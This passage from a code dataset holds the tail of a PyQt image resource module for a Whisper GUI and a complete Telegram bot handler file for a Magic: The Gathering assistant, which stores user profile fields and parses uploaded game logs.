\xcd\\x9a5\\\n\\x17\\xdcnLL4V\\xadX\\x86>\\xbd\\xbac\\xcd\\xaa\\\n\\x95\\x08|\\xf4\\xa8\\xdc\\x16}dff\\xbe\\xeb\\xda\\xd1\\xbd\\\nGO\\xd6=B\\xdf\\xfc\\x15pC4\\xdb\\x82\\x0bZ%\\\n/\\x8b\\xa5wH\\x98/\\xc6\\x5c\\xbe\\xdf\\xcc]\\x1a'\\x86\\\n\\x0df\\x0e-\\xd7\\x08-S\\xd0V\\xaf\\xc1\\x8e\\x882s\\\n\\xfa\\xb5\\xedE\\xcbl\\x9bhii\\xa9tt\\xb2w=\\\nE\\xa1\\xf9*4T\\xabu\\x80\\xe2\\x97\\x09\\xe6\\xff\\x13\\xb3\\\nmd\\x13F\\x1e-s\\x18\\x10\\x17\\x9e?\\x7f\\xc6z\\xb1\\\nm\\xde\\xb2%\\xbat\\xed\\xca\\xdau\\xbcz\\xf9\\xb2\\xd6\\xf6\\\n\\xb5\\xe5\\xe4\\x89?1l\\xc8 \\x5c\\xbax\\xc1(\\xf2\\xfe\\\n\\x9b\\xf8\\xfaj>\\xa9\\x8c\\xa3\\xd7\\xbd\\xba\\x91\\x1f}\\x8c\\xc0\\\n\\x87\\x0f\\x11\\x1d\\x13\\x0d\\xb9L\\x8e\\xccLE\\xc1\\x98\\x9f\\x9f\\\n\\xcf\\x12\\x1f\\xa6\\xa6\\xa6\\xb0\\xb2\\xb2b\\xd9\\xb2\\xb2\\xb6\\xe6\\xbc\\\ne\\x90[*\\x077==\\x9d\\xd35gN\\x9f\\xc2\\xd3\\\n\\xa0 
l\\xda\\xb2\\x15\\xee\\x8c\\x9b\\x87P\\x94\\xaeV\\x06\\x8a\\\n\\x85`\\xb7\\xee=\\x00\\x00\\xcdZ\\xb4\\xc0\\xdb\\xb7a\\xef>\\\n\\xbbw\\xef\\xae\\xd6\\xf6\\x99\\xd5\\xa2\\xcc\\x9b\\x08P\\x1c\\x11\\xbe\\\nx\\xe1\\xfc\\x7f\\xd7\\xe8$h\\x15\\xdf\\xdak\\xd5\\xaa\\xad\\xf4\\\n\\xdf\\xa6A\\x03\\xc5\\x08\\xed\\xcb\\xe0`\\xc8\\xe5r\\xce)\\x1e\\\n\\xcaz\\xd02)\\x9eu\\xee\\xf8nB\\x97\\x5c.GD\\\nx8\\xeaz{\\xab\\xb5\\xcd\\x8c\\xa62\\xb7;\\x99kq\\\n\\x89\\xb60\\xd3\\x18\\x98\\x22\\xd9\\xde\\xaeb\\x14\\x85\\x95\\xd0\\xb9\\\nkW\\xdceL\\xb8\\x12\\x8a\\xb4\\xd4T\\xfc\\xbao/~\\\n\\xdd\\xb7\\x17V\\xd6\\xd6\\xf0\\xf5\\xf5C\\x93&\\xbeh\\xdc\\xa4\\\n\\x09\\x1a7\\xf1\\x15l\\xda\\x94!)\\x89\\x1a\\xd6\\xf5\\xf6\\xc6\\\n\\xb7s\\xe6\\x1a\\xd4\\x97\\xc2\\xc2B\\xdc\\xba\\xf9\\x8f(\\xb6]\\\n]\\xddP\\xa7n]Am*K\\xe7QH9pb\\\n\\xa6\\x1ch\\x1f\\xa1e\\x16\\x961\\xbb\\x1c\\xa4$'\\xa3\\xb0\\\n\\xb0Pm\\x8a\\x8c\\xb2V\\x835\\x94\\x08Z\\xe6\\xfd(*\\\n*R\\xa3\\xbf\\xa5a\\x0e\\xb6\\xf1\\xaeWO\\xe9\\x0eJ]\\\nF\\xe4T\\x97\\xd6]\\xcc\\x1e\\xe7\\x12\\x89\\x84\\x95\\xef\\xeb\\xeb\\\n\\xeb\\x87#\\x87\\x0e\\xfe\\xb7NH\\x08\\xb2\\xb2\\xb2`mm\\\n\\xcdy\\x1d\\xe6\\x10\\x96J\\x95*\\xa1a\\xc3F033\\\nC\\x87\\x8e\\x9d\\x14\\x9esW\\xaf^\\xc6W\\xdf\\xcc\\x16%\\\n\\xbdP&\\x93a\\xd5\\x8a\\xe5\\x9c\\xc7w[YY\\xbd\\xfb\\\n\\x9b07\\xb7\\x80\\x85\\xa5\\xfa\\x94\\xbf\\x02%:\\xa94\\x99\\\n\\x99\\x99\\x0a/\\xf5\\x95+WV\\xf8\\xff\\x94H\\xa5\\xb0\\xb1\\\n\\xb1\\x81\\x5c&Grr\\x12\\xdc\\xdc\\xdc1f\\xdcxt\\\n\\xe8\\xd8\\x89\\x93\\xbfe\\x19\\xbd\\x0aZ;;;l\\xdd\\xb1\\\nK\\x9fK*%++\\x13\\x99\\x99Y\\xc8\\xca\\xcaD|\\\n\\x5c<\\x1e>\\xb8\\x8f\\x13\\x7f\\xfe\\xce\\xbaA\\xbd}\\x1b\\x86\\\nq\\xa3G\\xe1\\x97_\\x0f\\xb0nNBp\\xed\\x9a\\xa2\\xa0\\\nm\\xf7^{\\xd8\\xda\\xda\\x02(\\xde*9~\\xf4\\xb7w\\\n\\x9fE\\x84\\x87#11\\x81\\x15QU\\xc7cF\\xfb\\x92\\\n&\\x8c\\xe4{\\x80-huij\\x1d\\xc2\\x88\\xd0\\xaa\\x12\\\n\\x8f>\\xf5}\\x14~\\xce\\xca\\xcaDTd$<\\xaaW\\\n\\xe7\\xb4\\x0e[\\xd0*\\x7f\\xd1\\xf0\\xacQCa\\xe4lD\\\n\\x84fA\\xcb\\xcc\\x87c>\\xe0J\\x17{\\x00\\xc5\\xd1W\\\n\\x99L\\xa6v\\x1b]Y\\xcaAi\\x98\\x11Ze\\xdb\\xa2\\\n\\xe5\\x89\\xf6\\xed;b\\xc5\\xb2\\x1fE_';+\\x0b7\\\n\\xff\\xf9[\\xa1\\x1f\\xa5\\xbb\\x87\\x07\\xfc\\xfc\\xfcQ\\xbfAC\\\n4h\\xd0\\x00\\x8d\\x1a71\\xba\\xdc\\xdb\\xc4\\xc4\\x04\\x0cy\\\n\\x7f\\x18f\\xce\\xfa\\xda\\xa0\\xb9\\xb3\\x00\\xf0\\xf0\\xc1}\\xad&\\\n_i\\x83\\x18\\xe3\\x8e\\x99\\xdf-sss\\x85@I5\\\n'\\xc5\\xfbjRb\\xa2\\xc6\\xef\\xb7&Akoo\\x0f\\\nSS\\xd3w\\x9d\\x10d2\\x19\\x12\\x13\\x12X\\xf7\\x92\\xd2\\\n$$\\xb0\\x87\\xc1(\\xcbYe\\xde\\xfb\\xe2bc5\\xfa\\\n[\\x1a\\xe6\\xee\\x98\\xaaZ\\x06f\\x846\\xfc\\xed[\\xe4\\xe7\\\n\\xe5)\\xa4Vh\\x82\\x19$\\xa9Y\\xb3\\x16\\xab~\\x80\\xd9\\\n\\xe9@&\\x93\\xe1\\xd9\\xd3 
\\xb4h\\xd9\\x8a\\xf3:\\xa5\\xf3\\\n\\xcb\\x81\\xe2z\\x91\\x92\\xe2\\xf1>}\\xfb)<\\xe7\\xe2b\\\nc\\xf1\\xf4i\\x10\\x1a1\\xfa\\xa3\\xf3E.\\x97c\\xe1\\xfc\\\ny8y\\xe2O\\xd6gR\\xa9\\x14]\\xbbuG\\xff\\x01\\\n\\x03\\xd1\\xa8qc\\xadkb\\x08\\xcdT\\xc8\\xb6]\\xd6\\xd6\\\n6pvvF\\xadZ\\xb5\\xd1\\xbaM\\x1b|\\xfa\\xd9T\\\n\\xfcq\\xf2\\x0c>\\x998Ii\\x83\\xed/>\\x9f*x\\\n\\xd3\\xfb\\xa8\\xa8(\\xd6\\xd4\\x92\\xd2\\x15\\xcb\\xcd\\x9b\\xb7`\\xbd\\\n=>\\xd4\\x22\\xef'-5\\x955(\\xa1\\x89\\x92\\xf1\\x98\\\n\\xcc\\xa8\\xad\\xb2y\\xdb\\x9a`\\xa6\\x1c\\xa8\\x12\\x8f\\xf6\\xf6U\\\nX/\\x06\\xda\\xa4\\x1d0sh\\x99y\\xad%x2\\xda\\\n\\x91)k\\x83\\xc3\\x84\\xb9\\x1d\\xc8|8U\\xae\\x5cY\\xe1\\\n\\x01XTT\\x84\\xe4d\\xf5\\xbf'f\\x1e^\\xb5j\\x8a\\\n\\x82\\x96\\x95C[\\xce\\x05\\xad\\xbb\\x87\\x07\\xabU\\x9c\\xbe\\x88\\\n\\x8a\\x8c\\xc4\\xe9S'\\xb1j\\xc52\\x8c\\x1b\\xf31:u\\\nh\\x87I\\x13\\xc6c\\xf3\\xa6\\x0d\\x08\\xb8q\\xdd(\\xa2\\xe3\\\n\\xcd\\x9a\\xb7\\xc0\\xdcy\\xf3\\x0d.f\\x81\\xe2\\x81/b\\xd1\\\n\\xb5[w\\xc1m2#\\xb4v\\x8c\\xdd\\x11G\\xc7j\\x0a\\\n\\xf7\\xdb\\xc2\\xc2B\\xa4$'\\xab\\xb5\\xc9\\xdc\\xa5a\\xee\\xc0\\\nH\\xa5R82\\x87+hH;P\\x96\\xf3\\xafL\\xd0\\\n\\xda\\xd9\\xdb+\\x14\\x8a\\x15\\x14\\x14p\\x1e\\xf6\\x22\\x93\\xc9X\\\n\\xbbj\\xf5U\\x08Z/\\xaf\\x9a\\x0a\\xc3jd2\\x19^\\\n\\xbf~\\xc5i\\x9d\\x12\\x98A\\x12\\xbf\\xa6\\xec\\x9dB77\\\nw\\xd6\\xae\\x986y\\xb4r\\xb9\\x9c\\xd5\\x8e\\xaby\\xcb\\x96\\\n\\xef\\xfe\\xbbm\\xbb\\xf7X\\xbb4b\\xa4\\x1dl\\xdd\\xf2\\x93\\\nR1\\xdb\\xb8\\x89/\\x0e\\x1e>\\x8a\\xe5+W\\xe3\\xbd\\xf6\\\n\\x1dH\\xcc\\x8aD\\x85\\x14\\xb4\\xca\\xb0\\xb0\\xb0\\xc0\\x94\\xcf\\xa6\\\na\\xed\\xfa\\x8d\\xb0\\xb4\\xb4T\\xf8,8\\xf8\\x05\\xe6\\xce\\x99\\\n-hn\\x1e\\xb3\\x18\\xcc\\xc2\\xc2B\\xa1M\\x8d\\x83\\xa3#\\\n\\xab\\x05\\xd5\\x83\\x07\\xdc\\xe7\\xda?y\\xf2Xa\\x9b\\xc7\\xdc\\\n\\xdc\\x1c\\xde\\xf5|X\\xe7\\xd5\\xad\\xeb\\xcd\\xfa\\xff\\xd5&\\x8f\\\n655\\x85\\xb5=W\\xa7\\x8e\\xeah(\\xb3\\xfb\\x01W\\\nA[XX\\xc8z\\x800\\xf3\\xc8J`\\xe6\\x16jj\\\n\\xddUTT\\x84\\xa4$\\xc5\\xc6\\xe4\\xd5\\x94L\\xb7b>\\\n\\xb0\\x98\\x11\\x1a&\\xcc\\xdf\\x0bsrPE*\\x0a+\\xa1\\\n]\\xbb\\xf6\\x86v\\x01@q\\x14\\xf7\\xee\\x9d\\xdb\\xd8\\xb9}\\\n\\x1b\\xa6O\\xfb\\x0c\\x9d;\\xbe\\x87\\xfe}{a\\xdew\\xdf\\\n\\xe2\\xf8\\xd1\\xdf\\xf0\\xea\\x95\\xf6\\xb9\\x82bc\\xc8\\xf1\\xb6L\\\n\\xf8\\xf4\\xc6V\\x87\\x83\\x83\\x03k\\x8a\\xa1\\x100\\xbf[v\\\n\\xf6\\x8a\\xdf=sss\\x96\\xc8U'>\\xe5r9\\xeb\\\n\\x85\\x95\\x99\\x87\\x0b\\xb0_b5\\xa5*1\\xbb\\xb2H\\xa5\\\nR\\x85\\xba\\x87\\xd2\\xb8{0\\xf3h\\xb9\\x15\\x86\\x85\\x85\\xbd\\\namY\\xab\\x12\\xb4\\xa6\\xa6\\xa6\\xa8U\\xbb\\x8e\\xc21\\xe6\\\n\\x8e\\x9c:\\xe4r9\\xab\\xd3N\\x13\\x15\\x95\\xf4\\xbe\\x8c4\\\n\\x04m\\x06\\x0a\\xbd\\x0d\\x0bC2\\xe3\\x05\\xa4y\\xf3\\x16\\xef\\\n\\xfe\\xdb\\xcc\\xcc\\x8c\\xd5\\x06\\xee\\xea\\x95K\\x9c\\xeds\\xe1\\xc4\\\n\\x9f\\x7f`\\xfb\\xb6\\x9fY\\xc7\\x87\\xffo\\x04v\\xec\\xda\\xa3\\\nq\\x97\\x90\\xe0O\\xd9\\xb9C\\x96\\x11\\xdaw\\xe8\\x88\\x0d\\x9b\\\n\\xb7\\xb0D\\xde\\xb5\\xabW\\xb0i\\xe3z\\x15Wi\\xcfu\\\nF\\xfel\\xcbV\\xadYk\\xb6h\\xd1R\\xe1gm\\x22\\\n\\xb4\\xcc\\x9b\\x81O\\xfd\\xfa\\x0ao\\xda%\\x98\\x98\\x98(\\x8c\\\n;\\x04\\xb4\\x13\\xb4\\xcann\\xea\\xbe\\xb8,A\\xcb\\xb1\\xd3\\\nA\\x5cl,\\xab*WY\\x0e-\\xc0\\x9eu\\xae\\xa9u\\\nW\\xe2\\xbf\\xdb\\x8b\\xa5Q\\xd62\\x88U8\\xa2F\\xd0\\xca\\\n\\xe5r$0\\xa6\\xf70S\\x0e\\x98\\xdbn\\xe5\\xb9(\\xac\\\n\\x84\\xb6\\xed\\xda\\x19\\xda\\x05\\x95\\x94Dq\\x97,^\\x88a\\\nC\\x06\\xa1O\\xaf\\xeeX\\xf0\\xfd<\\x9c?w\\x16\\xa9\\xa9\\\n)\\x9a\\x0dT\\x10\\xc2\\xc3\\xdfr\\xee\\xef\\xac-\\x9d\\xbbt\\\n\\x15E\\xb83w?\\x98\\xf9\\xeb\\x00\\xe0\\xe4\\xcc]|\\xa
6\\\n\\xa4\\xa4\\xb0\\x1a\\xf83_x\\x01\\xf6K\\xac\\xa6\\x08-\\xf3\\\n\\xf7\\xea\\xea\\xea\\xaa\\xf4\\xbe\\x0d\\xb0w\\xa8\\x98;X\\xaa`\\\nv\\xb21\\xb7\\xb0@\\xad\\xda\\xec\\x82\\xb0\\x12\\x98\\x1d\\x08^\\\ni\\x91G\\x1b\\x11\\x11\\xcez\\x99h\\xa4d\\xa7\\x10`\\xf7\\\n\\xa3}\\xf2\\xf81\\xe7b*f\\xbb.+kk4`\\\nt\\xd5\\xe9\\xd4Y1\\x95%,,L\\xebh\\xb3*\\x1e\\\n\\x07\\x06\\xe2\\x87\\xc5\\x0bY\\xfe\\x8e\\x197\\x1e\\xb3\\xe7\\xcc\\xe5\\\n\\xd57\\x9f\\xe0\\x0e\\x09Z%4o\\xde\\x02\\xcbW\\xaef\\\n\\x156\\xed\\xd9\\xb5S\\xe9v\\x82\\xb6\\xa4\\xa7\\xa7\\xb3\\xda\\x86\\\n(\\xcb\\x1bk\\xca\\xa8\\x0a\\x0f\\x0d\\x09\\xe1\\xdcy\\x81Y\\x10\\\n\\xa6\\xae\\xbf\\x5c\\xe3\\xc6\\x8ayDO\\xb4\\xc8\\xa3e\\xa6\\x1b\\\n888\\xa8m\\xcf\\xc6\\xcc\\xc9z\\xc91B\\xab,\\xfa\\\n\\xa0*\\x87\\x96\\xb9\\xad\\x1d\\xfeV\\xbd\\xa0ev8\\x00\\xd8\\\n9\\xb4\\x00;\\x0d!NM/\\xda\\xf4\\xb44\\xd6d\\x1c\\\nV\\x84\\xd6\\xb6\\xe2Eh\\xfd\\x9b6-S\\x91Fu\\xc4\\\n\\xc6\\xc4\\xe0\\xc4\\x9f\\xbf\\xe3\\xdbo\\xbeB\\xb7\\xce\\x1d\\xf1\\xd1\\\n\\x87\\xff\\xc3\\xa6\\x0d\\xeb5F\\xe6\\xcb;\\x97/]\\x14\\xcd\\\nv\\xf7\\x9e\\xbdD\\xb1\\xcb\\x14\\xb4\\xcc\\xfcu\\x80\\x1dMU\\\n\\xd7\\x8bVY\\x1fj\\xe6\\xfd\\x01`\\xbf\\xc4*\\xbb\\xd7\\x94\\\n\\x86\\x99r\\xa0\\xae\\xe7+\\xbb\\xd3\\x017A\\xcb\\xbc\\xe7\\xd6\\\n\\xadSWm>9\\xf3\\x9e\\xcdL\\x95S\\x073\\xdd\\xc0\\\n\\xda\\xdaFi\\x07\\x1c\\x80\\xdd\\xe9 55\\x85s\\x1fq\\\nfA\\x98\\xbf\\x7fS\\xd6\\xf3\\xbbm\\xbb\\xf6\\xac\\x97\\x03\\xe6\\\nN\\xa9.$%%\\xe1\\xebY3XC\\x7f\\xde\\x1f6\\\n\\x1c\\x9fO\\x9f\\xc1\\xdb>\\xc1\\x1d\\xe3x\\xb2\\x18\\x80\\xf6\\x1d\\\n:b\\xee\\xf7\\x0bXy\\xac?,^\\xc8\\xdaB\\xd1\\x96\\\n\\xbf\\xff\\x0aP\\x886J$\\x12t\\xe8\\xd8\\x91u\\x1es\\\n\\xebM&\\x93qjN/\\x93\\xc9X7\\x92&MT\\\n\\xb7\\xe4`\\x8a\\xddgO\\x838\\xa7W\\x840\\x1a\\xabk\\\n\\xdaVa\\xf6:\\x8c\\x8b\\x8bCJ\\x8a\\xe6\\xe8\\x173\\xfa\\\n`ii\\x89\\xaa*\\x84s\\xf5\\xea\\x9e\\x0a\\xa2)11\\\nAm\\x0e4S\\xa0\\x98\\x9b\\x9b\\xc3\\xde\\x9e\\x1d\\xc1a>\\\n\\x9c\\xd4\\xf5\\x14LHd?\\x0cY9\\xb4\\x8c523\\\n3YQ\\xe8\\xf2\\x86\\xb5\\xb5\\x8d\\xce\\x15\\xec&&&\\x06\\\n+\\xe4\\x92\\xc9d\\x88\\x89\\x8e\\x86W\\xcd\\x9a\\x826\\xfc7\\\nF\\xc4\\x12\\xb4U\\xaaTAS\\x91&81\\x05-3\\\n\\xdd\\x07P\\x16MU->\\x95\\xbd\\xd4(K9`\\x16\\\n\\xf1j\\xcc\\xa1e\\x088O5\\xc3\\x05\\x98;T\\xcc\\xa2\\\nYU\\xbcx\\xc1\\xad \\xac\\x04V\\x10B\\x8b^\\xb4\\xcc\\\n\\x82\\xb0\\x86\\x8d\\x1a\\xa9|\\xa1\\xf5\\xf1\\xa9\\xcf\\xda\\xa5\\xe4\\x9a\\\nG\\xcb\\x8c\\xd0*\\x9b\\x9afmm\\x8d\\x96\\xadZ+\\x1c\\\n\\xbbq\\xfd\\x1a'\\xfb\\xaa(**\\xc27_\\xcdd\\xfd\\\n\\xbb\\xb6h\\xd1\\x12_\\xcf\\x9e\\xc3\\xcb6\\xa1=$h\\xd5\\\n0p\\xd0`\\x8c\\x1d\\xf7\\x89\\xc2\\xb1\\xfc\\xfc||5s\\\n\\x06'\\x11\\xa6\\x0a\\xe6\\x97\\xa8a\\xa3\\xc6J\\xbb\\x17T\\xab\\\n\\xe6\\xc4\\xca\\x9fz\\xc4!\\x8f\\xb6\\xb8\\xe5\\x89b\\x05\\xb2:\\\nA\\xdb\\x98!h333YSdT\\xc1\\x9c\\x14\\xc4\\\n\\xdc\\x9eb\\xe2\\xea\\xea\\xc6J\\x88\\x7f\\xf1B\\xf30\\x07f\\\n[\\x1a77w\\x95-W,,,\\x14\\xc4\\xa7\\xb2V\\\n8\\xa5a\\x0a\\xd3jNNJm3\\x1fX\\xea\\x22u\\\n\\xcct\\x04\\x1b\\x1b\\x1bV\\xfb9\\x1b\\x1b\\x1b\\x85\\x9b\\xbb\\x5c\\\n.\\xe7\\xdcV\\xce\\x98\\xd1vDg\\x09VVV\\xf8\\xfb\\\n\\xd6]\\x1c\\x1e\\xed\\xdaw\\xb4Z\\x1dj[\\xb4s\\xc7v\\xab\\x15\\\n\\x89\\xefn\\xc5\\xc6;l~:\\x9b\\xee\\x03\\x88\\xa4\\x07\\x18\\\n\\xa9E\\xcb\\xa6\\x1c\\x88\\xa5\\x1b\\x88\\x8dil\\x8567W\\\n\\xacd\\x97\\xe1\\xaa 
l\\xca\\x81\\x94\\x1c\\xda\\xac\\xac+\\x5c\\\npohC\\x98\\x9e\\x8f\\x8f\\x0f\\x82\\x83\\x83\\x05\\xd7\\xbbs\\\ngS\\xd1\\xb6]{\\xa3\\xef+/+\\xe3\\x16<\\x12\\x9b\\\n\\x1a/\\x93\\x95\\x9c\\xdc\\x1c\\x87\\xff\\xfe/@\\x94\\xb21\\x8c\\\nM7pvv6\\xf89\\xf7t\\xed\\x0a\\xf5\\xfb\\xefU\\\n>\\x81\\xd4j\\xb5\\xd8\\xf7\\xdb^\\x0cx\\xf0!\\x93\\x9f\\xc3\\\n\\xda\\xfa\\xcb\\x16\\xac\\xfe\\xfa+\\xc11www\\xcc\\xfbd\\\n>U1\\xa8!\\x14\\xd0\\x9a\\xa0V\\xab1}\\xc6,<\\\n\\xf5\\xe4`\\xa4\\xa7\\xa5U\\x1e\\xdf\\xbf\\xffO,Y\\xb4\\x10\\\n#G\\xbfh\\xd6xG\\x8f\\x1e\\xe1V\\xe1\\x8c\\x154n\\\n\\xde\\xa2%6m\\xdcP\\xf9\\xf3\\xa9S'M\\xd6\\x01d\\\n\\x1f\\xd3\\x18[\\x9d\\xd5Kl\\xda\\x14\\xbbw\\xfdW\\xc6\\xe4\\\n\\xc4\\x89\\x13&\\xff\\xc8/]\\xba\\xc4\\xed\\x96\\x95\\xb2\\x933\\\n66N\\x10\\xd0\\xcaY\\xa1\\x0d5\\x11dDFF\\x0a\\\n>\\xc3\\xd8&\\x16605\\xf4H\\x99\\xabr`,\\xe5\\\n\\x80\\xadA\\x1b(>\\xa6\\xb7\\x8f\\x8f \\xa0u\\x84\\x8da\\\n\\xec\\x13\\x01sd]\\xb9\\x22\\xfa;\\x16\\x14\\x14\\x84\\xa0\\xa0\\\n t\\xecd\\xb8\\x8a\\x82V\\xab\\x15\\xd4N\\xd5\\xe9t(\\\n)\\xb9\\x09\\x0f\\x0fO\\xa8T*\\xbbh\\xbe`m;\\xb6\\\no\\xb3\\xca\\xb8AAAhYeW\\xba\\xd2nH\\xca\\\n\\xa1\\x15\\xdet\\x1ak\\x7f\\xcb\\xd5\\xa05p\\x13\\xcc\\xad\\xd0\\\n\\x1a\\xb9\\x09\\x96Z\\xb2K\\x8fk\\xf6\\x92\\x93c\\xb2q\\x03\\\n\\xbb!\\xcc\\xd9\\xd9\\x19\\xd1\\x8d\\x1a\\x198\\xfb?\\x8db\\x1a\\\n\\x0b\\x03\\xdasgM\\x06\\xb4g\\xce\\x9c\\xe1\\xf2JM\\xfd\\\n\\xed\\xb3\\xf5h\\xa54X8zD\\x98\\x86\\xd7$>^\\\nt\\xb5\\x1c\\xb8\\x9b\\x02\\x12\\x9f\\x90(\\xd8\\xf8\\xbcw\\xef\\x1e\\\n\\xb3\\x03\\xda\\xf3\\xe7\\xce\\xe1\\xbdw\\xa6\\x0a\\x8e\\xa9T*\\xbc\\\n\\xf7\\xfeL\\xc5\\x9b\\x82\\x10\\xe9(\\xe5@\\x02\\x0f\\x0f\\x0f|\\\n4\\xefS\\xb83\\x7fT_,]\\x8c?\\xf6\\xfdn\\xd6\\\nX\\xbf\\xed\\xd9#\\xf89$4\\xd4\\xe0\\xca!\\xc0\\xe7\\xd1\\\n\\x96\\x97\\x97\\xe3\\xd4i\\xe3\\x8f\\xfcR\\x8e\\x09\\x1f\\xd3H\\x09\\\n \\xd8;Z)\\x95\\x0e\\xce\\x9d\\x15>\\xba\\xd2h4h\\\n\\xd8\\xa0\\xa1\\xc9\\xf7\\xc5\\xc6\\x09\\xcb\\x87I\\xa9tp\\xf9\\xb2\\\n0\\xa0e{\\x99\\xb3\\xb8J\\x07\\x22_\\x16z\\xa6\\x0a\\xa4\\\n\\x1b:~\\xf5j\\x8e\\xc1\\x5cc\\xae\\x95\\xae\\x81 
[... remainder of qt_resource_data elided: ~750 KB of machine-generated binary image data (embedded PNG icons, the application splash screen, and several inline SVG icons), not human-readable ...]\"\n
\nqt_resource_name = b\"...\"  # byte string elided; it encodes the resource tree resource/Image/ containing: whisper.svg, speak_white.svg, huggingface_logo-noborder.svg, Demucs_black.svg, Cancel_red.svg, headphone_black.svg, speak_black.svg, speak-16x24.svg, wave-16x16_black.svg, wave-16x16_white.svg, microphone.png, Demucs_white.svg, SplashScreen_0.4.0.png, robot-16x16_black.svg, FasterWhisper.png, headphone_white.svg, whisper-16x16.svg, robot-16x16_white.svg\n
\nqt_resource_struct = b\"...\"  # byte string elided; machine-generated offset table mapping the names above into qt_resource_data\n
\ndef qInitResources():\n QtCore.qRegisterResourceData(0x03, qt_resource_struct, qt_resource_name, qt_resource_data)\n\ndef qCleanupResources():\n QtCore.qUnregisterResourceData(0x03, qt_resource_struct, qt_resource_name, qt_resource_data)\n\nqInitResources()\n","repo_name":"LeoWang329/fatser-whisper-GUI","sub_path":"resource/_rc/rc_Image.py","file_name":"rc_Image.py","file_ext":"py","file_size_in_byte":752967,"program_lang":"python","lang":"ja","doc_type":"code","dataset":"github-code","pt":"40"}
{"seq_id":"72189612280","text":"import tables, strings, util, telegram\nfrom telegram import InlineKeyboardButton, InlineKeyboardMarkup, Update, ChatAction\nfrom peewee import *\nfrom emoji import emojize\nfrom telegram.ext import CallbackContext\nimport cacheable, json, os\nfrom datetime import date\n\n
\ndef start_pvt(update: Update, context: CallbackContext):\n try:\n tables.User.get(tables.User.user_id == update.message.from_user.id)\n text = strings.Start.start_pvt\n except DoesNotExist:\n text = strings.Global.user_not_exist\n finally:\n text += strings.Start.start_id.format(update.message.from_user.id, update.message.chat_id)\n context.bot.send_message(chat_id=update.message.chat_id, text=text, parse_mode=telegram.ParseMode.MARKDOWN)\n\n
\n@util.send_action(ChatAction.TYPING)\ndef dci(update: Update, context: CallbackContext):\n args = update.message.text.split(\" \")\n if len(args) == 1:\n text = strings.Dci.dci_invalid\n else:\n dci = args[1]\n try:\n if dci.isdigit() and not dci.startswith('-'):\n user = tables.User.get(tables.User.user_id == update.message.from_user.id)\n user.dci = dci\n user.save()\n text = strings.Dci.dci_set.format(dci)\n else:\n text = strings.Dci.dci_invalid\n except DoesNotExist:\n text = strings.Global.user_not_exist\n context.bot.send_message(chat_id=update.message.chat_id,\n text=text,\n parse_mode=telegram.ParseMode.MARKDOWN)\n\n
\n@util.send_action(ChatAction.TYPING)\ndef name(update: Update, context: CallbackContext):\n args = update.message.text.split(\" \", 1)\n if len(args) == 1:\n context.bot.send_message(chat_id=update.message.chat_id,\n text=strings.Name.name_invalid,\n parse_mode=telegram.ParseMode.MARKDOWN)\n else:\n name = args[1]\n try:\n user = tables.User.get(tables.User.user_id == update.message.from_user.id)\n user.name = name\n user.save()\n context.bot.send_message(chat_id=update.message.chat_id,\n text=strings.Name.name_set.format(name),\n parse_mode=telegram.ParseMode.MARKDOWN)\n except DoesNotExist:\n context.bot.send_message(chat_id=update.message.chat_id,\n text=strings.Global.user_not_exist,\n parse_mode=telegram.ParseMode.MARKDOWN)\n\n
\n@util.send_action(ChatAction.TYPING)\ndef arena(update: Update, context: CallbackContext):\n args = update.message.text.split(\" \", 1)\n if len(args) == 1:\n context.bot.send_message(chat_id=update.message.chat_id,\n text=strings.Arena.arena_invalid,\n parse_mode=telegram.ParseMode.MARKDOWN)\n else:\n arena = args[1]\n try:\n user = tables.User.get(tables.User.user_id == update.message.from_user.id)\n user.arena = arena\n user.save()\n context.bot.send_message(chat_id=update.message.chat_id,\n text=strings.Arena.arena_set.format(arena),\n parse_mode=telegram.ParseMode.MARKDOWN)\n except DoesNotExist:\n context.bot.send_message(chat_id=update.message.chat_id,\n text=strings.Global.user_not_exist,\n
parse_mode=telegram.ParseMode.MARKDOWN)\n\n\n@util.send_action(ChatAction.TYPING)\ndef logparser(update: Update, context: CallbackContext):\n file_id = update.message.document.file_id\n newFile = context.bot.get_file(file_id)\n filename = './temp/{}.log'.format(update.message.from_user.id)\n newFile.download(filename)\n with open(filename, \"r\") as file:\n for line in file:\n if \"<== PlayerInventory.GetPlayerCardsV3\" in line:\n json_object = line[line.index(\"{\"):]\n player_cards = json.loads(json_object)\n # print(player_cards)\n if \"<== PlayerInventory.GetPlayerInventory\" in line:\n json_object = line[line.index(\"{\"):]\n player_inventory = json.loads(json_object)\n text = strings.Log.log_result_parsing.format(date.today().strftime(\"%d/%m/%Y\"),\n player_inventory['payload']['vaultProgress'],\n player_inventory['payload']['gems'],\n player_inventory['payload']['gold'])\n context.bot.send_message(chat_id=update.message.chat_id,\n text=emojize(text, use_aliases=True),\n parse_mode=telegram.ParseMode.MARKDOWN,\n reply_to_message_id=update.message.message_id)\n break\n os.remove(filename)\n\n\n@util.send_action(ChatAction.TYPING)\ndef help_pvt(update: Update, context: CallbackContext):\n if update.message.from_user.id in cacheable.get_admin_ids(context.bot):\n button_list = [InlineKeyboardButton(\"user\", callback_data=\"help_user\"),\n InlineKeyboardButton(\"admin\", callback_data=\"help_admin\")]\n reply_markup = InlineKeyboardMarkup(util.build_menu(button_list, n_cols=2))\n text = strings.Help.admin_help\n context.bot.send_message(chat_id=update.message.chat_id,\n text=emojize(text, use_aliases=True),\n parse_mode=telegram.ParseMode.MARKDOWN,\n reply_markup=reply_markup)\n else:\n text = strings.Help.user_help\n context.bot.send_message(chat_id=update.message.chat_id,\n text=emojize(text, use_aliases=True),\n parse_mode=telegram.ParseMode.MARKDOWN)\n\n\ndef help_cb(update: Update, context: CallbackContext):\n query = update.callback_query\n button_list = [InlineKeyboardButton(\"user\", callback_data=\"help_user\"),\n InlineKeyboardButton(\"admin\", callback_data=\"help_admin\")]\n reply_markup = InlineKeyboardMarkup(util.build_menu(button_list, n_cols=2))\n if \"help_user\" in query.data:\n reply = strings.Help.user_help\n pass\n else:\n reply = strings.Help.admin_help\n pass\n try:\n context.bot.edit_message_text(text=reply, chat_id=query.message.chat_id,\n message_id=query.message.message_id, reply_markup=reply_markup,\n parse_mode=telegram.ParseMode.MARKDOWN)\n except telegram.error.BadRequest:\n context.bot.answer_callback_query(callback_query_id=update.callback_query.id)\n","repo_name":"A7F/mtg-telegram-assistant","sub_path":"on_pvt.py","file_name":"on_pvt.py","file_ext":"py","file_size_in_byte":6791,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"12770794749","text":"from django.shortcuts import render\nfrom catalog.models import *\nimport random\nimport time\nfrom django.contrib import auth, messages\nfrom django.contrib.auth.hashers import 